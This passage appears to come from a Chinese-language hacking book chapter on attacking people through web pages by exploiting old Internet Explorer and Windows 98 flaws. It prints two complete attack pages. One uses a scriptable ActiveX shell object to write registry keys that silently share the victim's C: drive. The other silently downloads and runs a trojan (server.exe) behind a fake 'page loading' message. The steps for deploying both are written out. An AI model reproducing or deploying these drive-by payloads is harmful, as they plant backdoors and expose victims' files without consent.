由于Microsoft的浏览器存在着严重的安全漏洞,导致人们在日常浏览网页时使系统遭受攻击,比如:万花谷病毒、混客炸弹、恶意代码、浏览网页时被加载木马、格式化硬盘、共享硬盘等。接下来看看这些攻击者是如何来利用别人在浏览网页时攻击他人计算机的。
5.7.1 攻击类
1. 共享他人硬盘
在Windows 98中存在个共享漏洞,即在注册表的以下键值中:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加个键如C$然后再加几个键值:
"Flags"=dword:00000302
"Type"=dword:00000000
"Path"="C:\\"
这样系统就会把C盘设为共享了,共享名为RWC$,而且网络属性中还看不到。如果把"Flags"=dword:00000302 改成
"Flags"=dword:00000402
就可看到, 源程序如下:
******************************************************************************
<script language=javascript>
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD" );
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" );
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\" );
}
function init()
{
setTimeout("f()", 1000);
}
init();
******************************************************************************
将上面代码另存为htm,这样当对方浏览过这个页面的时候,对方的C盘就被悄悄地共享了。
2. 通过网页加载木马
当受害者用浏览器浏览一个网页的时候,一个EXE的文件就在后台悄悄地被自动下载并运行,攻击者可以把这个EXE换成一个很小的木马(比如孤独剑客的WinShell,大小只有5k)。当受害者浏览该网页后,该木马就被悄悄地下载并运行,从而受害者的计算机就会被打开了一个后门,为攻击者提供了入侵的窗口,源程序如下:
******************************************************************************
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"server.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<Html><h1>网页加载中,请稍后....</h1></Html>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
******************************************************************************
将以上代码另存为htm文件后,同server.exe(木马)上传到一个主页空间里。当受害者浏览该网页看到“网页加载中,请稍后....”的时候,那个同路径下的server.exe文件也会被无条件执行
